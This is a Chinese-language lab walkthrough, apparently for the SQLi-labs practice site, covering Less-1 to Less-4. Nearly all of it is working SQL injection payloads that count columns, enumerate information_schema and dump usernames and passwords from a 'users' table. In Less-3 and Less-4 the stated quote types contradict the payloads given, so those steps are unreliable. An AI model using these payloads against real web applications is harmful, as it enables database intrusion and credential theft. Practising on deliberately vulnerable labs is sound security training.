Less-1
提示你输入数字值的ID作为参数,我们输入?id=1
接下来判断是字符型还是数字型
输入?id=1' //报错
输入?id=1' --+ //(--+为注释符)正常回显
我们判断出是字符型
用order by语句来查看有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。一步一步测试
?id=1'order by 3 --+
将3换成4后就报错,说明数据有3列
?id=1'order by 4 --+
爆出显示位:
?id=-1'union select 1,2,3--+
然后获取当前数据名和版本号
?id=-1'union select 1,database(),version()--+
爆表
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆列名:
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
查询到账号密码在这个表中,现在要得到该字段内容
?id=-1' union select 1,2,group_concat(username ,id , password) from users--+
Less-2
思路和第一关一样,先判断为什么类型
输入?id=1‘ --+ //报错
输入?id=1 --+ //正常回显
说明是数字型注入
用order by语句来查看有几列
?id=1 order by 3--+
显示位:
?id=-1 union select 1,2,3--+
然后获取当前数据名和版本号
?id=-1 union select 1,database(),version()--+
爆表:
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆列名
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
查询到账号密码在这个表中,现在要得到该字段内容
?id=-1 union select 1,2,group_concat(username ,id , password) from users--+
Less-3
输入?id=1'出现回显如下,根据报错信息我们可以推断单引号字符型且有括号,所以需要闭合单引号且也要考虑括号
用order by语句来查看有几列:
?id=1") order by 3--+
显示位:
?id=-1") union select 1,2,3--+
然后获取当前数据名和版本号:
?id=-1") union select 1,database(),version()--+
爆表:
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆列名:
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
得到该字段内容:
?id=-1") union select 1,2,group_concat(username ,id , password) from users--+
Less-4
输入?id=1根据页面报错信息得知sql语句是双引号字符型且有括号
用order by语句来查看有几列:
?id=1') order by 3--+
显示位:
?id=-1') union select 1,2,3--+
然后获取当前数据名和版本号:
?id=-1') union select 1,database(),version()--+
爆表:
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆列名:
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
得到该字段内容:
?id=-1') union select 1,2,group_concat(username ,id , password) from users--+